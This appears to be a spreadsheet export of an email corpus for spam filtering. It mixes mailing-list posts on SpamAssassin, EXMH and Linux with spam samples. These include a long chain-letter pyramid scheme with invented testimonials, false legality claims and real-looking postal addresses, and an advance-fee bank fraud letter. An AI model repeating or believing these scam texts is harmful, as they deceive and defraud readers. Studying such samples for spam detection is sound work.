 well within the capabilities of ordinary people
 who know little about internet marketing. And the
 earnings potential is truly staggering!
 I'll make you a promise. READ THIS E-MAIL TO THE END! -
 follow what it says to the letter - and you will not
 worry whether a RECESSION is coming or not, who is
 President, or whether you keep your current job or not.
 Yes, I know what you are thinking. I never responded
 to one of these before either. One day though,
 something just said: "You throw away $25.00 going to
 a movie for 2 hours with your wife. What the heck."
 Believe me, no matter where you believe those "feelings"
 come from, I thank every day that I had that feeling. 
 I cannot imagine where I would be or what I would be
 doing had I not. Read on. It's true. Every word of it.
 It is legal. I checked. Simply because you are buying
 and selling something of value.
 AS SEEN ON NATIONAL TV:
 Making over half a million dollars every 4 to 5
 months from your home.
 THANKS TO THE COMPUTER AGE AND THE INTERNET!
 ==================================================
 BE AN INTERNET MILLIONAIRE LIKE OTHERS WITHIN A YEAR!!!
 Before you say "Bull", please read the following.
 This is the letter you have been hearing about on the
 news lately. Due to the popularity of this letter on
 the internet, a national weekly news program recently
 devoted an entire show to the investigation of this
 program described below, to see if it really can make
 people money. The show also investigated whether or
 not the program was legal.
 Their findings proved once and for all that there are
 "absolutely NO laws prohibiting the participation in
 the program and if people can 'follow the simple
 instructions' they are bound to make some mega bucks
 with only $25 out of pocket cost".
 DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT
 THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING
 BETTER THAN EVER.
 This is what one had to say: "Thanks to this
 profitable opportunity. I was approached many times
 before but each time I passed on it. I am so glad
 I finally joined just to see what one could expect
 in return for the minimal effort and money required.
 To my astonishment, I received a total $610,470.00
 in 21 weeks, with money still coming in."
 Pam Hedland, Fort Lee, New Jersey.
 ==================================================
 Another said: "This program has been around for a
 long time but I never believed in it. But one day
 when I received this again in the mail I decided
 to gamble my $25 on it. I followed the simple
 instructions and walaa ..... 3 weeks later the
 money started to come in. First month I only made
 $240.00 but the next 2 months after that I made
 a total of $290,000.00. So far, in the past 8 months
 by re-entering the program, I have made over
 $710,000.00 and I am playing it again. The key to
 success in this program is to follow the simple
 steps and NOT change anything."
 More testimonials later but first, =======
 ==== PRINT THIS NOW FOR YOUR FUTURE REFERENCE ====
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 If you would like to make at least $500,000 every
 4 to 5 months easily and comfortably, please read the
 following...THEN READ IT AGAIN and AGAIN!!!
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND 
 YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!
 INSTRUCTIONS:
 =====Order all 5 reports shown on the list below =====
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE
 REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
 person whose name appears ON THAT LIST next to the report.
 MAKE SURE YOUR RETURN ADDRESS IS ON  YOUR ENVELOPE TOP
 LEFT CORNER in case of any mail problems.
 ===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
 ===YOU ORDER EACH OF THE 5 REPORTS! ===
 You will need all 5 reports so that you can save
 them on your computer and resell them.
 YOUR TOTAL COST $5 X 5 = $25.00.
 Within a few days you will receive, via e-mail, each
 of the 5 reports from these 5 different individuals.
 Save them on your computer so they will be accessible
 for you to send to the 1,000's of people who will
 order them from you. Also make a floppy of these
 reports and keep it on your desk in case something
 happens to your computer.
 IMPORTANT - DO NOT alter the names of the people who
 are listed next to each report, or their sequence on
 the list, in any way other than what is instructed
 below in steps 1 through 6 or you will lose out
 on the majority of your profits. Once you
 understand the way this works, you will also
 see how it will not work if you change it. 
 Remember, this method has been tested, and if you
 alter it, it will NOT work!!! People have tried
 to put their friends'/relatives' names on all five
 thinking they could get all the money. But it does
 not work this way. Believe us, some have tried to
 be greedy and then nothing happened. So Do Not
 try to change anything other than what is instructed.
 Because if you do, it will not work for you.
 Remember, honesty reaps the reward!!! 
 This IS a legitimate BUSINESS. You are offering a
 product for sale and getting paid for it. Treat it
 as such and you will be VERY profitable in a short
 period of time.
 1.. After you have ordered all 5 reports, take this
 advertisement and REMOVE the name &amp; address of the
 person in REPORT # 5. This person has made it through
 the cycle and is no doubt counting their fortune.
 2.. Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
 3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
 4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
 5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position.
 PLEASE MAKE SURE you copy every name &amp; address
 ACCURATELY! This is critical to YOUR success.
 ==================================================
 **** Take this entire letter, with the modified
 list of names, and save it on your computer.
 DO NOT MAKE ANY OTHER CHANGES.
 Save this on a disk as well just in case you lose
 any data. To assist you with marketing your business
 on the internet, the 5 reports you purchase will
 provide you with invaluable marketing information
 which includes how to send bulk e-mails legally,
 where to find thousands of free classified ads and
 much more. There are 2 primary methods to get this
 venture going:
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY
 ==================================================
 Let's say that you decide to start small, just to see
 how it goes, and we will assume you and those involved
 send out only 5,000 e-mails each. Let's also assume
 that the mailing receives only a 0.2% (2/10 of 1%)
 response (the response could be much better but let's
 just say it is only 0.2%). Also many people will send
 out hundreds of thousands of e-mails instead of only
 5,000 each.
 Continuing with this example, you send out only
 5,000 e-mails. With a 0.2% response, that is only
 10 orders for report # 1. Those 10 people responded
 by sending out 5,000 e-mails each for a total of
 50,000. Out of those 50,000 e-mails only 0.2%
 responded with orders. That's 100 people who
 responded and ordered Report # 2.
 Those 100 people mail out 5,000 e-mails each for
 a total of 500,000 e-mails. The 0.2% response to
 that is 1000 orders for Report # 3.
 Those 1000 people send 5,000 e-mails each for a
 total of 5 million e-mails sent out. The 0.2%
 response is 10,000 orders for Report # 4.
 Those 10,000 people send out 5,000 e-mails each
 for a total of 50,000,000 (50 million) e-mails.
 The 0.2% response to that is 100,000 orders for
 Report # 5.
 THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00
 (half a million dollars).
 Your total income in this example is: 1..... $50
 + 2..... $500 + 3.....$5,000 + 4..... $50,000
 + 5.... $500,000 .... Grand Total=$555,550.00
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND
 FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
 MATTER HOW YOU CALCULATE IT, YOU WILL STILL
 MAKE A LOT OF MONEY!
 ==================================================
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
 ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think
 for a moment what would happen if everyone or half
 or even one 4th of those people mailed 100,000
 e-mails each or more?
 There are over 150 million people on the internet
 worldwide and counting, with thousands more coming
 online every day. Believe me, many people will do
 just that, and more!
 METHOD # 2: BY PLACING FREE ADS ON THE INTERNET
 ==================================================
 Advertising on the net is very, very inexpensive and
 there are hundreds of FREE places to advertise.
 Placing a lot of free ads on the internet will
 easily get a larger response. We strongly suggest
 you start with Method # 1 and add METHOD # 2 as you
 go along. For every $5 you receive, all you must
 do is e-mail them the report they ordered. That's it.
 Always provide same day service on all orders.
 This will guarantee that the e-mail they send out,
 with your name and address on it, will be prompt
 because they cannot advertise until they receive
 the report.
 ===========AVAILABLE REPORTS ====================
 The reason for the "cash" is not because this is
 illegal or somehow "wrong". It is simply about time.
 Time for checks or credit cards to be cleared or
 approved, etc. Concealing it is simply so no one
 can SEE there is money in the envelope and steal
 it before it gets to you.
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY.
 Notes: Always send $5 cash (U.S. CURRENCY) for
 each report. Checks NOT accepted. Make sure the
 cash is concealed by wrapping it in at least
 2 sheets of paper. On one of those sheets of
 paper, write the NUMBER &amp; the NAME of the report
 you are ordering, YOUR E-MAIL ADDRESS and your
 name and postal address.
 PLACE YOUR ORDER FOR THESE REPORTS NOW :
 ==================================================
 REPORT # 1: "The Insider's Guide To Advertising
 for Free On The Net"
 Order Report #1 from:
 Robert Borowczyk
 ul. J. Olbrachta 118C m. 28
 01-373 Warsaw
 Poland
 ______________________________________________________
 REPORT # 2: "The Insider's Guide To Sending Bulk
 Email On The Net"
 Order Report # 2 from: 
 Mohammad Faraziyan
 Engelbertstr. 25 
 40233 Dsseldorf
 Germany
 ______________________________________________________
 REPORT # 3: "Secret To Multilevel Marketing On The Net"
 Order Report # 3 from:
 Luis Pastor
 Apartado 81
 48080
 Bilbao
 Spain
 ______________________________________________________
 REPORT # 4: "How To Become A Millionaire Using
 MLM &amp; The Net"
 Order Report # 4 from: 
 Ali Reza
 Auf den Holln 68
 44894 Bochum
 Germany
 ______________________________________________________
 REPORT # 5: "How To Send Out One Million Emails
 For Free"
 Order Report # 5 From:
 J.siden
 krondikesvgen 54 A
 83147 stersund
 Sweden
 ______________________________________________________
 $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
 Follow these guidelines to guarantee your success:
 === If you do not receive at least 10 orders for
 Report #1 within 2 weeks, continue sending e-mails
 until you do.
 === After you have received 10 orders, 2 to 3 weeks
 after that you should receive 100 orders or more for
 REPORT # 2. If you do not, continue advertising or
 sending e-mails until you do.
 ** Once you have received 100 or more orders for
 Report # 2, YOU CAN RELAX, because the system is
 already working for you, and the cash will continue
 to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time
 your name is moved down on the list, you are placed
 in front of a different report.
 You can KEEP TRACK of your PROGRESS by watching which
 report people are ordering from you. IF YOU WANT TO
 GENERATE MORE INCOME SEND ANOTHER BATCH OF E-MAILS
 AND START THE WHOLE PROCESS AGAIN. There is NO LIMIT
 to the income you can generate from this business !!!
 =================================================
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM: 
 You have just received information that can give you
 financial freedom for the rest of your life, with
 NO RISK and JUST A LITTLE BIT OF EFFORT. You can
 make more money in the next few weeks and months
 than you have ever imagined. Follow the program
 EXACTLY AS INSTRUCTED. Do Not change it in any way.
 It works exceedingly well as it is now.
 Remember to e-mail a copy of this exciting report
 after you have put your name and address in
 Report #1 and moved others to #2 .....# 5 as
 instructed above. One of the people you send this
 to may send out 100,000 or more e-mails and your
 name will be on every one of them. 
 Remember though, the more you send out the more
 potential customers you will reach. So my friend,
 I have given you the ideas, information, materials
 and opportunity to become financially independent.
 IT IS UP TO YOU NOW !
 =============MORE TESTIMONIALS===============
 "My name is Mitchell. My wife, Jody and I live in
 Chicago. I am an accountant with a major U.S.
 Corporation and I make pretty good money. When I
 received this program I grumbled to Jody about
 receiving 'junk mail'. I made fun of the whole
 thing, spouting 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received total $ 147,200.00 ......... all cash!
 I was shocked. I have joined Jody in her 'hobby'."
 Mitchell Wolf M.D., Chicago, Illinois
 ================================================
 "Not being the gambling type, it took me several
 weeks to make up my mind to participate in this plan.
 But conservative as I am, I decided that the initial
 investment was so little that there was just no way
 that I wouldn't get enough orders to at least get
 my money back. I was surprised when I found my
 medium size post office box crammed with orders.
 I made $319,210.00 in the first 12 weeks. 
 The nice thing about this deal is that it does not
 matter where people live. There simply isn't a
 better investment with a faster return and so big."
 Dan Sondstrom, Alberta, Canada
 =================================================
 "I had received this program before. I deleted it,
 but later I wondered if I should have given it a try.
 Of course, I had no idea who to contact to get
 another copy, so I had to wait until I was e-mailed
 again by someone else......... 11 months passed then
 it luckily came again...... I did not delete this one!
 I made more than $490,000 on my first try and all the
 money came within 22 weeks."
 Susan De Suza, New York, N.Y.
 =================================================
 "It really is a great opportunity to make relatively
 easy money with little cost to you. I followed the
 simple instructions carefully and within 10 days the
 money started to come in. My first month I made $20,
 in the 2nd month I made $560.00 and by the end of the
 third month my total cash count was $362,840.00.
 Life is beautiful, Thanx to internet."
 Fred Dellaca, Westport, New Zealand
 =================================================
 ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR
 ROAD TO FINANCIAL FREEDOM !
 =================================================
 If you have any questions of the legality of this
 program, contact the Office of Associate Director
 for Marketing Practices, Federal Trade Commission,
 Bureau of Consumer Protection, Washington, D.C.
 This message is sent in compliance of the proposed
 bill SECTION 301, paragraph (a)(2)(C) of S. 1618. 
 * This message is not intended for residents in the
 State of Washington, Virginia or California,
 screening of addresses has been done to the best
 of our technical ability.
 *  This is a one time mailing and this list will
 never be used again.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 828] spamassassin.org is unreliable
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=828
 jm@jmason.org changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|ASSIGNED                    |RESOLVED
          Resolution|                            |FIXED
 ------- Additional Comments From jm@jmason.org  2002-09-21 16:35 -------
 OK, this should now be considered fixed, I should think.
    Domain Name: SPAMASSASSIN.ORG
    Name Server: NS.PEREGRINEHW.COM
    Name Server: NS1.RTS.COM.AU
    Name Server: NS2.RTS.COM.AU
    Name Server: NS3.RTS.COM.AU
    Name Server: FAMILY.ZAWODNY.COM
 etc.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</si>
  <si>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Re: Strange tcl/tk messages from EXMH 2.5...
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; 
 &gt; I am getting some strange messages from EXMH 2.5.
 &gt; Since I just finished reinstalling it, I dont see how something could be
 &gt; missing. Here is the message:
 &gt; 
 &gt; When the Compose or Reply windows first come up, I get a popup that says:
 &gt;     Invalid I-spell style: 'extr switch with no body' changing to underline
 &gt; 
 &gt; Any thoughts??? I this complaining about a EXMH routine being missing?
 &gt; Or What???
 &gt; -- 
 &gt;                                         Reg.Clemens
 &gt;                                         reg@dwf.com
 &gt; 
 &gt; 
 Let me answer my own question.
 This seems to be a problem in tk8.4.
 There is a switch statement at lines 691-697 in ispell.tcl inside a catch.
 It ends with a line ending with a backslash, followed by a blank line.
 This seems to be enough to confuse this verson of tk.  Removing the backslash
 causes the error to go away, and the catch is not executed.
 -- 
                                         Reg.Clemens
                                         reg@dwf.com
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm listed as a developer on SF and have the spambayes CVS module checked
 out using my SF username, but I'm unable to write to the repository.  CVS
 complains:
     % cvs add unheader.py
     cvs [server aborted]: "add" requires write access to the repository
 Any thoughts?
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">It will function as a router if that is what you wish.
 It even looks like the modem's embedded OS is some kind of linux, being that
 it has interesting interfaces like eth0.
 I don't use it as a router though.... I just have it do the absolute minimum
 DSL stuff and do all the really fun stuff like pppoe on my linux box........
 Also the manual tells you what the default password is.
 Don't forget to run pppoe over the alcatel speedtouch 350i as in my case you
 'HAVE TO' have a bridge configured in the router/modem's software........
 This lists your VCI values etc.
 &gt; Also, does anyone know if the high-end SpeedTouch, with
 &gt; 4 ethernet ports, can act as a full router or do I still
 &gt; need to run a pppoe stack on the linux box?
 &gt;
 &gt; Regards,
 &gt;
 &gt; Vin
 &gt;
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] keep submitting known spam?
</t>
  </si>
  <si>
    <t xml:space="preserve">If you're an ISP or running a good size mail server and you submit 2-5
 thousands messages a day regardless if it's already been submitted,
 would your rating go up faster offsetting the drop from revokes?
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: News.Com: "Amazon.com is hoping to use more than the honor system
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:4:27:03PM
 Date: Mon, 23 Sep 2002 23:27:03 GMT
 News.Com[1]: "Amazon.com is hoping to use more than the honor system to protect 
 a payment method it established online last year."
 [1] http://rss.com.com/2100-1017-959046.html?type=pt&amp;part=rss&amp;tag=feed&amp;subj=news
</t>
  </si>
  <si>
    <t xml:space="preserve">Market Internet Access 
 No Investment Needed 
 Premium Internet Access for only $14.95 per month or less! 
 Earn $1 per Subscriber per month
 Go To:
 http://new.isp.50megs.com/
 1918BQhX5-227CpaM0598cJWr2-912YmJg32l34
</t>
  </si>
  <si>
    <t xml:space="preserve">With enough warning, you might not even care about trying to divert 
 the meteor -- you'd divert the Earth instead.
 I recall reading many years ago about calculations, done separately
 both by US and USSR scientists for different reasons, about the
 effect of nuclear explosions on the moon's mass, and thus its orbit,
 and thus also (over time) the Earth's path around the sun.
 I believe the conclusion was that mild changes in the moon's 
 composition would have the effect, over several years, of changing 
 significantly where the Earth would be at any certain future point. 
 Voila! No collision -- at least not with the initial threat. And
 no need to travel out to anywhere near the meteor, either. Just
 the moon.
 - Gordon
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[6]: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Bill,
 Monday, September 30, 2002, 5:46:11 PM, you wrote:
 &gt;&gt; MF&gt; I don't think free speech is a license to speak directly at
 &gt;&gt; and be in the
 &gt;&gt; MF&gt; physical presence of any particular individual of your
 &gt;&gt; choosing - especially
 &gt;&gt; MF&gt; when that individual is busy doing something else and isn't
 &gt;&gt; interested.
 BS&gt; Yep. I agree 100%
 &gt;&gt;
 &gt;&gt; Sure.  And that goes back to my second argument -- Cohen.   THey can
 &gt;&gt; walk away.   NObody compells them to stand there, I'll agree fully.
 &gt;&gt; But we still have a Constitutional right to speak out against
 &gt;&gt; policies, actions and grievances.
 &gt;&gt;
 &gt;&gt; Again.  If you want it another way, lets change the Constitution.
 BS&gt; Huh?  Are you saying that whoever has the loudest voice gets to be heard?
 BS&gt; Shouting down a public speaker could be considered a form of censorship. If
 BS&gt; shouting down public speakers is 'protected' it is only a matter of time
 BS&gt; before the people doing the shouting have their tactic used against
 BS&gt; them -every single time they open their mouth-. The tactic is stupid and
 BS&gt; non-productive and if generally used, will only result in chaos.  The tactic
 BS&gt; is just stupid ego-bation at best, unless the goal is to generate chaos.
 BS&gt; And humans whose goals and actions in life are to create chaos in society
 BS&gt; should be locked up (provided you can accurately identify them, which is not
 BS&gt; really possible anyway, but hey, this is my rant :-). IMHO.
 BS&gt; Bill
 No offense or anything, but there's a difference between holding a
 sign that doesn't agree with Bush and screaming at him.
 My sole point, as far as the 1st Amendment goes is that there is more
 to this game than just being an angry, liberal youth.  (Which is the
 gross culmination of everyone's argument sofar)  The screaming isn't
 the most effective method around.  I don't believe I argued that it
 was.  But screaming is happening because the means to communicate to
 the representatives involved are diminishing, at least as far as the
 people doing the screaming are concerned.   For the record, I don't
 support the screamers in organized conferences (Such as the Colin
 Powell shout-down that was mentioned earlier).  I don't think that
 this is what the 1st Amendment was implying.  These folks -do- have a
 right to be heard, and I think they have a right to be heard by the
 folks they elected in the first place.
 My point, (my only point) was really more concerned with the cases
 such as Mr. Nell.   He wasn't engaged (at least from the limited facts
 we have) in a shoutout, but rather in a difference of opinion.   He
 has a right to possess this opinion and make it known  to the
 representatives that are elected.   A sign is not a shout-out.
 I think I may have missed (or not accurately addressed) the original
 thread switch that took this example and mixed in the screaming
 dissenters to the mix.  I was mostly responding with my miffedness in
 having broad-brush strokes applied to a group without examining the
 policy reasons that might have contributed to it.   IN this case, the
 screaming parties are fed up with getting corralled miles away from
 the folks they need to speak with.   They're resorting to creative,
 offensive and constitutionally challengable means, but its not simply
 due to the fact that they're 20 and have lost all decorum.   The 'My
 generation never did this ' is all BS.   THere's more to this story,
 we just dont' know it all.
 I hope this clarifies my position.   For the quick rehash:
 Screaming != Free speech on all cases.
 Dissent = Free speech, provided you follow what has been laid down by
 the Supremes.
 K?
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 839] mailbox corruption not fixed with procmail 3.22
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=839
 ------- Additional Comments From alan@rdrop.com  2002-09-05 22:22 -------
 I haven't tried 2.41 yet because it requires File::Spec, which barfs when
 spamassassin tries to use it.  I haven't filed a bug yet because I suspect it's
 because I'm still running 5.005 perl because of reported compatibility issues
 with 5.6 and later, but I probably will because I think there's too much legacy
 perl code to put up with major compatibility problems, and spamassassin didn't,
 at least in the quickest of looks, say it needed a newer one.  The perl @ stuff
 was bad enough...  but this is all a separate soapbox...
 ------- You are receiving this mail because: -------
 You are the assignee for the bug, or are watching the assignee.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</si>
  <si>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Profitable Business Relationship
</t>
  </si>
  <si>
    <t xml:space="preserve">MR MABO LOKO
 BRANCH OFFICER,
 UNITED BANK FOR AFRICA PLC
 ILUPEJU LAGOS NIGERIA
 ATT:PRESIDENT/C.E.O
 SIR                 
           AN URGENT BUSINESS PROPOSAL
 I am pleased to get across to you for a very urgent and profitable 
 business proposal,Though I don't know you neither have I seen you before but my confidence was reposed On you when the Chief Executive of Lagos State
 chamber of Commerce and Industry handed me your contact for a 
 confidential business. 
 I am AN OFFICER with the United Bank for Africa Plc (UBA),Ilupeju branch,
 Lagos Nigeria.
 The intended business is thus; We had a customer, a Foreigner (a 
 Turkish)resident in Nigeria, he was a Contractor with one of the Government Parastatals. He has in his Account in my branch the sum of US$35 Million(Thirty five Million U.S. Dollars).
 Unfortunately, the man died four years ago until today non-of his next
 of kin has come Forward to claim the money. 
 Having noticed this, I in collaboration with two other top Officials
 of the bank we have covered up the account all this while.  
  Now we want you (being a foreigner) to be fronted as one of his next
 of kin and forward Your account and other relevant documents to be 
 advised to you by us to attest to the Claim. 
 We will use our positions to get all internal documentations to back
 up the claims .The whole procedures will last only ten working days to
 get the fund retrieved successfully Without trace even in future.
 Your response is only what we are waiting for as we have arranged all
 necessary things  As soon as this message comes to you kindly get back to me indicating your interest ,Then I will furnish you with the whole procedures to ensure that the deal is successfully Concluded 
 For your assistance we have agreed to give you thirty percent (30%) of
 the Total sum at the end of the transaction. It is risk free and a mega
 fortune. 
 All correspondence Towards this transaction will be through the e-mail
 addresses. 
 I await your earliest response.  
 Thanks, 
 Yours Sincerel
 MR MABO LOKO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</si>
  <si>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latest php upgrade in 7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-22 at 19:10, Troy Engel wrote:
 &gt; Anyone have an idea what the heck RedHat did here, and why we're now 
 &gt; trying to install a ton of crap I don't want?  (I'm hoping someone else 
 &gt; has chased this down and could save me time... ;) )
 I'm told that even our best people occasionally screw up. And QA had
 tested the rpm on an "Everything" install. Expect a fixed version soon,
 and QA procedures have been adjusted to catch this kind of braindamage
 in the future. There is nothing really wrong with the binary inside the
 rpm, so if you want to --nodeps for now it's ok.
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do you owe money? [ovn610]
</t>
  </si>
  <si>
    <t xml:space="preserve">
   Do you owe money? Is it getting troublesome keeping track
 of all those bills and whom you owe how much and when? Would
 it not be easier if you could just make 1 monthly payment
 instead of several? We can help!
   If your debts are $4,000 US or more and you are a United
 States citizen, you can consolidate your debt into just one
 easy payment! You do not have to own a home, nor do you need
 to take out a loan. Credit checks are not required!
   To receive more information regarding our services, please
 fill out the form below and return it to us, or provide the
 necessary information in your response. There are absolutely
 no obligations. All the fields below are required for your
 application to be processed.
 **********
 Full Name : 
 Address : 
 City : 
 State : 
 Zip Code : 
 Home Phone : 
 Work Phone : 
 Best Time to Call : 
 E-Mail Address : 
 Estimated Debt Size : 
 **********
 Please allow upto ten business days for application
 processing.
 Thank You
 Note: If this e-mail arrived to you by error, or you wish
 to never receive such advertisements from our company,
 please reply to this e-mail with the word REMOVE in the
 e-mail subject line. We apologize for any inconveniences
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Legal Services YOU can Afford ilywe
</t>
  </si>
  <si>
    <t xml:space="preserve">How would you like a Top Rated Law Firm working for you, your family and your business for only pennies a day?
 CLICK HERE
 http://211.78.96.11/legalservices/
 Get full details on this great service! FREE!
 Whether it's a simple speeding ticket or an extensive child custody case, we cover all areas of the legal system.
  * Court Appearances on Your Behalf
  * Unlimited Phone Consultations
  * Review of ALL Your Legal Documents &amp; Contracts
  * Take Care of Credit Problems
 And that is just the beginning!
 CLICK HERE
 http://211.78.96.11/legalservices/
 to get full details on this great service!
 **********************************************
 Simple Removal instructions:
 To be removed from our in-house list simply visit
 http://211.78.96.11/removal/remove.htm
 Enter your email addresses to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Merchant Account Information                XAXFT
</t>
  </si>
  <si>
    <t xml:space="preserve">Request A Free No Obligation Consultation!
 Accept Credit Cards Today!
 No Set Up Fees
 No Application Fees
 All Credit Types Accepted
 Retail Rates as Low as 1.60%
 Mail Order Rates As Low as 2.30%
 Set Up Your Merchant Account within 48 Hours
 NO CANCELLATION FEES
 No Money Down
 No Reprogramming Fees
 We Will Beat Anybodys Deal By 15%
 We make it easy and affordable to start accepting Credit Cards today.
 99% of our applicants are approved!
 http://64.251.23.141/marketing/merchantnet/
 to be removed : http://64.251.23.141/marketing/removeme.html
</t>
  </si>
  <si>
    <t xml:space="preserve">"Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt; writes:
 &gt; The CD player we have combines play and pause in a single button, but
 &gt; doesn't provide *instantaneous* feedback that the button was pushed, instead
 &gt; requiring you to wait until the music starts, 5-10 seconds. This is a UI
 &gt; disaster. Since Tatum doesn't get feedback right away, she presses the
 &gt; button again, thereby pausing the CD before it even plays. She'll only ever
 &gt; get music if she presses the button an odd number of times. This happens a
 &gt; surprising amount of the time, since she eventually hits the button again
 &gt; when the music doesn't play.
 Nice to hear that somebody else does this too.
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Strongbad E-Mail
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8396718,1717/
 Date: 2002-09-30T15:14:16+01:00
 [IMG: http://www.newsisfree.com/Images/fark/homestar.gif ([Homestar Runner])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Viridian Note 00324: 911.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Key concepts: ubiquitous computation,
 emergency relief, Khaki Green, 911.net,
 Terrorspace, Cradle.net, Battlespace,
 Prosthetic Ubicomp, SO/HO Ubicomp,
 Safetyspace, Street.net, Punish.net,
 Industrial Ubicomp, Ubitopia
 Attention Conservation Notice:  It's the
 Pope-Emperor blue-skying it at some
 computer industry event in Brussels.
 Links:
 I was there.
 http://www.highgrounddesign.com/design/design.htm
 And then I went to Brussels and delivered this speech.
 http://www.ttivanguard.com/
 And next I'm going here!
 http://conferences.oreillynet.com/os2002/
 And right after that I'm going to another, weirder event
 that I can't even tell you about!
 -------------------------------------------
 Entries in the Global Civil Society Design Contest.
 From: Steven W. Schuldt &lt;swschuldt*mac.com&gt;
 http://www.americanrobotz.com/images2/Soon_GlobalCivilSocietyLaptop.jpg
 From: Ben Davis &lt;bend*earthlink.net&gt;
 http://www.digitaleverything.com/GlobalComputer.htm
 From: Joerg F. Wittenberger &lt;Joerg.Wittenberger*pobox.com&gt;
 http://www.askemos.org/ 
 http://www.askemos.org:9080/RomePaper.pdf
 From: Scott Vandehey &lt;scot*spaceninja.com &gt;
 http://spaceninja.com/viridian/notebook.html
 From: Bob Morris &lt;bob*bomoco.com&gt;
 http://viridianrepository.com/GlobalCivil/
 From: Anonymous
 http://home.freiepresse.de/befis/zx2000.html
 http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
 http://www.vkb.co.il/
 From: Jim Thompson &lt;jim*musenki.com&gt;
 http://www.simputer.org
 http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.html
 From: Mike Rosing &lt;eresrch*eskimo.com&gt;
 http://www.eskimo.com/~eresrch/viridian
 From: till*tillwe.de (Till Westermayer)
 Date: Sun Jul 14, 2002  05:38:00 PM US/Central
 "What do we need for a global civil society notebook? Six design
 criteria are highlighted, combined with some rough sketches."
 http://www.westermayer.de/till/projekte/02gcsdl.htm
 Best regards,
 Till Westermayer - till we *)
 http://www.westermayer.de/till/index.htm
 This contest expires August 15, 2002. 
 --------------------------------------------------------
 Speech at TTI Vanguard: "Designing for Resiliency" 
 Conference
 "911.net"
 by Bruce Sterling
      Late last month I had the joy and privilege
 of hanging out with a big crowd of American computer
 scientists who were, basically, trying to find some 
 reasons to live.
     Despite all evidence to the contrary, they've
 definitely got some reasons.
     When you go to a conference which is very high-energy, 
 with a lot of paradigmatic reassessment going on, where 
 ideas are being flung around bodily well outside the box, 
 well, that's an impressive thing.  But it's my principle 
 as a sometime working journalist  not to get all carried 
 away whenever I witness something like that.  They might 
 well be drinking their own bathwater.  This sort of thing 
 generally requires a reality check from some *other* 
 conference. 
